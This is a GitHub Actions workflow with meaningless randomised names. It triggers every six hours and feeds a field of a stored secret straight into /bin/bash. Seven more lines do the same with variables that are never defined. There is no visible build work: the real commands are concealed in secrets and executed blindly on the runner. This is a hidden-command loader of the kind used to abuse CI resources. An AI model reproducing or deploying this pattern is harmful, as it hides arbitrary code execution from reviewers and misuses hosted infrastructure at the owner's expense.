name: duanyongchang8769

on:
  workflow_dispatch:
  schedule:
    - cron: '44 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: duanyongchang8769
        env:
          hny0: ${{ secrets.hny0 }}
        run: |
          echo $hny0 | jq -r .sho55667 | /bin/bash
          echo $mvs40 | jq -r .oglz2 | /bin/bash
          echo $ei885 | jq -r .qpnkv2 | /bin/bash
          echo $gluff074 | jq -r .z97335 | /bin/bash
          echo $xpro94 | jq -r .mbm1 | /bin/bash
          echo $a237 | jq -r .gikvi45580 | /bin/bash
          echo $khzj6 | jq -r .e25506 | /bin/bash
          echo $ndpu0 | jq -r .pth4 | /bin/bash

